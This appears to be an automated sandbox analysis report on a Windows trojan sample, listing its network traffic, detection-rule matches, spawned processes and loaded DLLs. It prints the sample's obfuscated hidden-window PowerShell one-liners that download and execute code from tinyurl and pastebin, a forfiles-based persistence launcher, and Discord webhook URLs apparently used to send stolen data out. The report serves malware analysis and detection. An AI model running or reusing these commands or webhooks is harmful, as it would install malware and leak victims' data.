Source: global trafficHTTP traffic detected: GET /bdhpvpny HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: tinyurl.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 216Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:08:33 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729001314x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LOOe4xbhUtxpb4QqymtypeX0J4MY2HoX0R64P0lynOZa%2FqywR3hPeseHLJW%2FW2fOhw179RpID%2FZfcGuEkDiFH09lT7yACLJQoOL9oByhy%2BZlrBmAxow67x9Ogjhs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=071caa7cf962937357e114a6e27d75dfa742eb30-1729001313; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=NcUK2lEgjsnxvrHiCU4VknYATx8I.UozHHWRfgF.gfk-1729001313478-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3061c0ad916b5f-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:08:45 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729001327x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pSkkG8F3pujVaSVtAZIfG9Ht4OEei7Zmhhany3VCo55doCiXyXcD1SO%2FNDaW%2BPKChxlEjfMmFJgxwKns8obO%2Bct5hzfVIQdZtKEBO5ADYUdqCSyz2EyLB0QA1eEg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=6037ab852f611d9c59da53270f9ef9f7968de046-1729001325; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=ISHjpiQsrSxXfPR9ENjK_tyB.Jn36.Se.X6qJjfRW80-1729001325730-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d30620d3f354750-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:08:53 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729001335x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2BaLmMdDzGUHXS%2F5%2FOVkC%2BecgwBoqf6IlMnSk0nEi1bkArecnSldedeFAa%2F2Cz9pGCUB2fOVHfAPaF4dksBXiSRfh3Egn6wUrw%2F7MuuOnEvWaIAcsKpIsXQDY3tn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=3cc8826b8e129a25e091786ff5323dda09268d5c-1729001333; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=l0qBvyRSAKsNlkkIOvi66k6mtMXweaE6.S7EcWQGQu8-1729001333690-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d30623eec3f463e-DFW
Source: powershell.exe, 00000009.00000002.2001538441.000001FD12896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.00000210814AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11E26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD118D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD11E42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000E.00000002.2082988609.0000021080508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000E.00000002.2082988609.0000021080AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080085000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.2001538441.000001FD1141B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD11430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.000002108005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080025000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.2001538441.000001FD12896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.00000210814AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000009.00000002.2001538441.000001FD12896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.00000210814AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080BA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 0000000E.00000002.2082988609.0000021080BA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000009.00000002.2001538441.000001FD118D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11E26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD11E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080AF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000009.00000002.2001538441.000001FD11EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2001538441.000001FD11E42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2082988609.0000021080A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.8:49719 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_5632.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_5336.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5632, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE2B9669_2_00007FFB4AE2B966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE2C7129_2_00007FFB4AE2C712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE2D1B19_2_00007FFB4AE2D1B1
Source: vF20HtY4a4.exeStatic PE information: No import functions for PE file found
Source: vF20HtY4a4.exe, 00000000.00000000.1460079281.000001FD048B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOrigami.exe0 vs vF20HtY4a4.exe
Source: vF20HtY4a4.exeBinary or memory string: OriginalFilenameOrigami.exe0 vs vF20HtY4a4.exe
Source: amsi64_5632.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_5336.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5632, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal92.troj.evad.winEXE@19/14@4/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1840:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbt0tg1a.xkx.ps1Jump to behavior
Source: vF20HtY4a4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vF20HtY4a4.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\vF20HtY4a4.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: vF20HtY4a4.exeReversingLabs: Detection: 34%
Source: unknownProcess created: C:\Users\user\Desktop\vF20HtY4a4.exe "C:\Users\user\Desktop\vF20HtY4a4.exe"
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
